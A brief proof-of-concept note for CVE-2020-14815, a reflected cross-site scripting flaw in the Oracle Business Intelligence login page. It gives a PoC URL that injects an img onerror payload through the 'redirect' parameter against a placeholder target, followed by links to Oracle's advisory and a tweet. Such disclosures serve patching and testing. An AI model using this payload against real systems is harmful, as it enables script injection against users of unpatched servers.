CVE-2020-14815 Oracle Business Intelligence XSS

CVE-2020-14815 Oracle Business Intelligence XSS

PoC：

https://target[.]com/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(document.domain)>

ref：

https://www.oracle.com/security-alerts/cpuoct2020.html

https://twitter.com/HackerOn2Wheels/status/1326927875279380480